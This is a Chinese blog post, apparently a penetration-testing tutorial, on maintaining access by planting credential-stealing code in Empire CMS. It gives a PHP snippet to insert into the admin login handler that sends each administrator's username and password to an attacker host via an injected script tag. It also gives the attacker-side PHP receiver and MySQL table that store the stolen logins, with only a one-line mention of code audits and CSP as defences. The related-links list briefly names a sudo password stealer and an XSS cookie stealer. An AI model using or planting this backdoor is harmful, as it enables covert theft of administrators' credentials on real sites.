账户名密码是怎样被窃取的,简单模拟攻击者权限维持流程。

最新推荐文章于 2024-05-16 17:54:50 发布
最新推荐文章于 2024-05-16 17:54:50 发布
阅读量610 收藏 8
点赞数 12
分类专栏: Web安全 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cul1n/article/details/136325009
版权

前言

在我们进行渗透测试的时候,常常需要进行权限维持,常见的 Javascript窃取用户凭证是一种常见的攻击手法。
之前我们可能学习过钓鱼网页的使用,如果我们通过渗透测试进入到用户的服务器,其实也可以通过在网页中植入Javascript代码的方式来达到权限维持的效果。
本篇文章通过分析Javascript用户凭证窃取,来分析如何进行权限维持。

正文

凭证劫持流程

“凭证劫持”(Credential Hijacking)是指攻击者通过非法手段窃取或获取到用户的认证信息(如用户名和密码),从而在无需合法用户授权的情况下,冒充该用户访问受保护的网络资源或服务。
实现凭证劫持的流程非常简单,如下图所示:

凭证劫持实现权限维持的需要:

  • 受控服务器
  • 恶意代码植入
  • 攻击者服务器接收用户名及密码

凭证劫持演示

前置环境准备:

  1. 帝国 CMS:http://www.phome.net/
  2. 用户数据库创建

在攻击者服务器中,我们使用如下语句来创建相关的数据库:

CREATE DATABASE flash;

USE flash;

CREATE TABLE info (
  username VARCHAR(255) NOT NULL,
  password VARCHAR(255) NOT NULL
);

以上MYSQL语句的作用是创建一个名为flash的数据库以及一个名为info的表单,表单中包含两列,一列为username,另一列为password
我们本次实验使用帝国 CMS 进行实验测试,在帝国 CMS 处理后台管理员账户名密码的文件/admin/ecmsadmin.php中,我们可以看到这样一段代码:

if($enews=="login")//登陆
{
  $username=$_POST['username'];
  $password=$_POST['password'];
  $key=$_POST['key'];
  $loginin=$username;
  login($username,$password,$key,$_POST);
}
else
{
  printerror("ErrorUrl","history.go(-1)");
}

这段代码用于处理前端表单数据中 POST 上来的usernamepassword,并将其赋值给相关变量,此时我们在if条件判断成功语句中插入恶意执行Javascript代码:

$url = "http://xxx.xxx.xxx.xxx/index.php?user={$username}&pass={$password}";
$up = "<script src=\"{$url}\"></script>";
echo $up;

此时在攻击者服务器中部署恶意代码,代码内容如下:

<?php
// 数据库连接信息
$servername = "localhost";$username = "root";
$password = "root";$dbname = "flash";

// 创建连接
$conn = new mysqli($servername, $username,$password, $dbname);

// 检查连接
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}

// 用户名和密码从 GET 请求中获取,实际应用中应从安全的地方获取
$user =$_GET['user'];
$pass =$_GET['pass'];

// 准备检查唯一性的 SQL 语句
$stmt =$conn->prepare("SELECT * FROM info WHERE username = ?");
$stmt->bind_param("s",$user); // 绑定参数 's' 表示字符串类型
$stmt->execute();

// 获取结果
$result =$stmt->get_result();

// 检查是否存在相同用户名和密码
if ($result->num_rows > 0) {
    // 如果存在,则不执行 INSERT 语句
    echo "该用户名或密码已存在。";
} else {
    // 如果不存在,准备插入语句
    $stmt =$conn->prepare("INSERT INTO info (username, password) VALUES (?, ?)");
    $stmt->bind_param("ss",$user, $pass);
    
    // 执行插入语句
    if ($stmt->execute()) {
        echo "新用户已成功添加。";
    } else {
        echo "添加新用户失败:" . $stmt->error;
    }
}

// 关闭语句和连接
$stmt->close();$conn->close();
?>

此时我们模拟管理员登录进入到帝国 CMS 页面:
image.png
并先后用以下账户名和密码进行登录:

username1:pasword1
admin:password
guest:guestpasword

此时访问攻击者服务器数据库,此时相关用户名与密码已经存入到数据中,凭证成功劫持。
image.png

总结

本篇文章总结了常见的钓鱼网页的钓鱼手法,以及通过使用这种手法达到凭证劫持的效果,在工作环境中,我们要进行代码审计来审查自己的服务代码中是否被黑客植入了恶意代码或者发现未知漏洞,同时也可以实施CSP可以限制哪些来源的资源可以被加载到网页中,以此减少恶意脚本的风险。

颠勺厨子
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
路由器登录密码被人窃取并修改后的恢复方法
10-01
很多人的无线网安全做的不够到位,经常会遇到无线网密码被人窃取的情况,也就是我们常说的蹭网,甚至连无线路由器的登录密码也给修改了,下面与大家分享下登录密码被改后的恢复方法,如果你有此经历可不要错过喽
域内权限维持
weixin_43047908的博客
06-04 685
目录Windows 操作系统常见持久性后门Windows系统隐藏账户 当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门来维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。 Windows 操作系统常见持久性后门 几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘键后门、注册表后门、Windows 计划
漏洞攻击流程
m0_58625755的博客
05-31 2223
3.1隐藏自己的行踪 攻击者入侵就是要神不知鬼不觉地侵入到目标计算机,因此,在入侵攻击之前要对自己做个伪装,不能让被攻击者轻易发现。在通过网络对目标计算机发起攻击之前,先对自己真实的IP地址隐藏。一般攻击者都是利用他人的电脑来隐藏自己真实的IP地址的。 3.2查询分析目标计算机 攻击要有目标,在网络中的IP地址就能够真正标识一个在网的计算机,而域是为了更好地对IP地址进行记忆管理的另一种显现方式,这样利用域和IP地址就能确定目标计算机了。确定了目标计算机之后,就可以对其操作系统类型及所提供的服务等
Metasploit(后渗透攻击:权限提升)
qq_41453632的博客
12-03 5678
    通常,我们在渗透攻击时很有可能只获得了一个系统的Guest或User权限。低的权限级别将使我们受到很多的限制,在实施横向渗透或者提权攻击时将很困难。在主机上如果没有管理者权限,就无法进行获取Hash、安装软件、修改防火墙规则和修改注册表等各种操作,所以必须将访问权限从Guset提升到User,再到Administrator,最后到System级别。    渗透的最终目的是获取服务器的最高...
内网渗透测试:域内权限维持思路总结
qq_45521281的博客
02-21 1636
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录Windows 操作系统常见持久性后门Windows系统隐藏账户Shift 粘滞键后门(1)手动制作(2)Empire 下的利用注册表键后门(1)手动制作(2)Metasploit 下的利用(3)Empire 下的利用Windows 计划任务后门(1)利用 at 命令(2)利用 schtasks 命令(3)利用SharPersist工.
12.2、后渗透测试--令牌窃取
无痕的博客
12-13 455
后渗透阶段meterpreter--令牌窃取
Session攻击
凉茶铺的博客
07-27 1197
形象地说,假设系统是一间屋子,持有钥匙的人可以开门进入屋子,那么屋子就是通过“锁和钥匙的匹配”来进行认证的,认证的过程就是开锁的过程。因此,当认证成功后,就需要替换一个对用户透明的凭证。如果进来的是屋子的主人,那么他可以坐在沙发上看电视,也可以进到卧室睡觉,可以做任何他想做的事情,因为他具有屋子的“最高权限”。会话固定也可以看成是会话劫持的一种类型,原因是会话固定的攻击的主要目的同样是获得目标用户的合法会话,不过会话固定还可以是强迫受害者使用攻击者设定的一个有效会话,以此来获得用户的敏感信息。...
蓝桥杯-网络安全比赛(6) 模拟实验 Metasploit 控制并获取Windows 登录HASH、LM Hash和NTLM Hash密文解析
Superstacks超全栈
05-06 907
计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要。这是一个非常重要的设计原则,因为如果密码以明文形式存储,那么任何能够访问存储位置的人或程序都可以轻易地获取到密码,这显然是不安全的。在验证过程中,LSA可能会调用相应的验证程序包(如msv1_0.dll),对用户输入的信息进行处理,并与存储在SAM(安全账户管理器)数据库中的密钥进行对比。最后,winlogon进程对用户登录进行最后的处理,完成整个登录过程。
中间人攻击是什么?
lavin1614
10-28 444
中间人攻击发生在第三方不知道合法参与者的情况下拦截数字对话时。此对话可以发生在两个人类用户、一个人类用户和一个计算机系统或两个计算机系统之间。在任何这些情况下,攻击者都可能只是简单地窃听对话以获取信息(考虑登录凭据、私人账户信息等)。或者他们可能会模拟其他用户来操纵对话。在后一种情况下,攻击者可能会发送错误信息或共享恶意链接,这可能会导致系统崩溃,或为其他网络攻击打开大门。通常情况下,合法用户不会意识到他们实际上正在与非法第三方通信,直到发生损害以后才意识到。中间人攻击的一个例子是会话劫持。
web权限提升-令牌窃取&烂土豆&dll劫持
m0_61506558的博客
10-20 455
通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌。dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋AlwaysInstallElevated提权默认禁用配置,利用成功机会很少(四)不带引号服务路径配合MSF-web当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行(如图1)。
sudo-stealer:sudo密码窃取者的POC
05-22
sudo-stealer sudo密码窃取者的POC 脚步: mkdir ~/.xd echo "export PATH=~/.xd:\$PATH" >> ~/.bashrc将sudo文件复制到〜/ .xd / chmod +x ~/.xd/sudo
JS写XSS cookie stealer来窃取密码的步骤详解
10-18
JavaScript是web中最常用的脚本开发语言,js可以自动执行站点组件,管理站点内容,在web业内实现其他有用的函数。这篇文章主要介绍了JS写XSS cookie stealer来窃取密码的步骤详解,需要的朋友可以参考下
利用JavaScript缓存远程窃取Wi-Fi密码的思路详解
10-17
主要介绍了利用JavaScript缓存远程窃取Wi-Fi密码的方法,本文通过实例代码相结合的形式给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
如何防止单片机被恶意攻击技术打破
01-19
因此,作为电子产品的设计工程师,了解当前的单片机攻击是非常必要的  2 单片机设计进攻技术性  现阶段,进攻单片机设计关键有几种技术性,各自是:  (1)手机软件进攻  该技术性一般 应用CPU通信接口并...
防静电劳保鞋:工业安全中的隐形守护者
YOUSUTO的博客
05-16 341
因此,防静电措施在工业安全中显得尤为重要。在众多防静电措施中,防静电劳保鞋作为工作人员脚下的隐形守护者,发挥着不可替代的作用。防静电劳保鞋作为工业安全中的隐形守护者,在防止静电危害方面发挥着重要作用。在工业生产中,我们应该充分认识到防静电措施的重要性,并合理选择和使用防静电劳保鞋等防护用品。在电子制造、石油化工、物流运输等行业中,静电可能导致设备损坏、产品性能下降,甚至引发火灾或爆炸。而防静电劳保鞋作为工作人员日常穿着的防护用品,能够在人员走动、操作设备时,有效消除人体静电积聚,减少静电带来的潜在风险。
【容联云通讯注册/登录安全分析报告-严重低级问题】
最新发布
05-16 716
容联云通讯致力于为全球客户提供领先的智能通讯与营销科技服务,应该是通讯行业的独角兽,并且在美国上市,据了解,容联云通讯在早期使用的网易易盾的滑动验证码,但本次测评时,不知道为何换成自己研发的了, 1 缺钱 ,2 觉得第三方的不安全?不管哪种原因,总之是换成自己的了,并且出现这么严重的低级问题!在业界面前被打脸, 对比起自己作为高科技企业的地位!很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“
全面解析防静电措施:保障工业安全,预防静电危害
YOUSUTO的博客
05-16 142
静电是一种常见的物理现象,由于电荷的不平衡而产生。在特定的环境中,静电可能会带来危害,如损坏电子设备、引起火灾等。因此,采取适当的防静电措施是非常重要的。总之,防静电需要采取综合的措施,从环境、设备、人员等多个方面入手,才能有效地减少静电的危害。
主流五款文档透明加密软件分享|安全且稳定的加密软件
m0_69398711的博客
05-16 187
本文将为您推荐几款优秀的文档透明加密软件,帮助您更好地保护数据安全。Ping32、安在云系统、AxCrypt、Veracrypt以及BitLocker等文档透明加密软件都是目前市场上较为优秀的选择。它们采用了先进的加密技术,提供了丰富的安全管理功能,能够满足不同用户的需求。在数字化时代,选择一款合适的文档透明加密软件,无疑是企业和个人保护数据安全的重要措施之一。
什么叫缓冲区溢出?攻击者是如何利用缓冲区溢出进行攻击的?
06-09
缓冲区溢出(Buffer Overflow)是一种常见的软件漏洞,指当程序向缓冲区写入数据时,超出了缓冲区的边界,导致数据溢出到其他变量或代码段中,从而造成程序崩溃或者被攻击者利用。 攻击者可以利用缓冲区溢出进行攻击,攻击方式如下: 1. 攻击者向程序输入超出缓冲区大小的数据,从而覆盖了程序中的关键数据,比如函数返回地址、控制流指针等。 2. 攻击者通过覆盖函数调用栈中的返回地址,将程序执行跳转到攻击者指定的代码,从而执行恶意代码。 3. 攻击者还可以利用缓冲区溢出来改写程序中的变量,甚至是修改程序的执行流程和程序的逻辑,从而达到攻击的目的。 缓冲区溢出攻击危害巨大,因为攻击者可以通过这种方式来执行远程代码、获取系统权限窃取机密信息等。缓冲区溢出攻击也是黑客最常用的攻击手段之一,因此需要编写安全的代码、及时修补漏洞、加强系统安全性,以防止这种攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值